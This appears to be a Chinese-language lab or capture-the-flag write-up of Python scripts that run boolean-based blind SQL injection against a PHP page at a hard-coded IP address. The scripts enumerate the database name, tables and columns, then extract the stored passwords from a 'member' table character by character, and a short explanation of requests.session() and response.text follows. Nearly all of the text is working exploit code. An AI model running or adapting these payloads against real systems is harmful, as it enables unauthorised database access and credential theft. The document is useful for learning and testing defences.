数据库长度
from requests import *
r=session()
url = 'http://124.70.71.251:40332/new_list.php?id=1 and length(database())='
for i in range(20):
url1=url+str(i)
re=r.get(url1)
if "2018" in re.text:
print(i)
数据库名称
from requests import *
r=session()
url = 'http://124.70.71.251:40545/new_list.php?id=1 and '
for i in range(10):
for j in range(48,128):
payload=url+'ascii(substr(database(),'+str(i)+',1))='+str(j)+"--+"
re=r.get(payload)
if "2018" in re.text:
print(chr(j),end='')
数据库表数量
from requests import *
r = session()
url = 'http://124.70.71.251:47637/new_list.php?id=1 and '
for i in range(20):
payload = url + "(select count(table_name) from information_schema.tables where table_schema='stormgroup')=" + str(i) + "--+"
re = r.get(payload)
if '2018' in re.text:
print(i)
数据库表名
from requests import *
r = session()
url = 'http://124.70.71.251:47637/new_list.php?id=1 and '
for i in range(20):
for j in range(2):
payload = url + "length((select table_name from information_schema.tables where table_schema='stormgroup' limit " + str(j) + ",1))=" + str(i) + "--+"
re = r.get(payload)
if "2018" in re.text:
print(i)
字段数量
from requests import *
r=session()
url = 'http://124.70.71.251:47637/new_list.php?id=1 and '
for i in range(10):
payload=url+"(select count(column_name) from information_schema.columns where table_schema='stormgroup' and table_name='member')="+str(i)+" --+"
re=r.get(payload)
if "2018" in re.text:
print(i)
字段名
from requests import *
r = session()
url = 'http://124.70.71.251:47637/new_list.php?id=1 and '
for k in range(3):
for j in range(10):
for i in range(47, 128):
payload = url + "ascii(substr((select column_name from information_schema.columns where table_name='member' limit "+str(k)+",1)," + str(
j) + ",1))=" + str(i) + "--+"
re = r.get(payload)
if "2018" in re.text:
print(chr(i), end="")
print("\n")
爆破表中密码
from requests import *
r=session()
url = 'http://124.70.71.251:47637/new_list.php?id=1 and '
for i in range(3):
for j in range(50):
for k in range(48, 128):
payload = url + "ascii(substr((select password from member limit "+str(i)+",1)," + str(j) + ",1))=" + str(k) + " --+"
re = r.get(payload)
if "2018" in re.text:
print(chr(k), end="")
print("\n")
对一些代码做一下解释:
r=session():它的作用是创建一个新的会话对象,该对象可以用于管理与远程服务器之间的连接和请求。通过使用会话对象,你可以保持一些状态信息,例如cookies、headers等,以便在不同的请求之间共享。
re.text:直接输出 re 对象会显示该对象的默认字符串表示形式,通常是一个包含响应头和状态信息的字符串。这个字符串对于理解响应的整体结构可能是有帮助的,但如果你只关心响应的主体内容,那么使用 re.txt 会更加方便和直观。
比如:
import requests
url = 'https://www.example.com'
response = requests.get(url)
print(response)
//输出
//<Response [200]>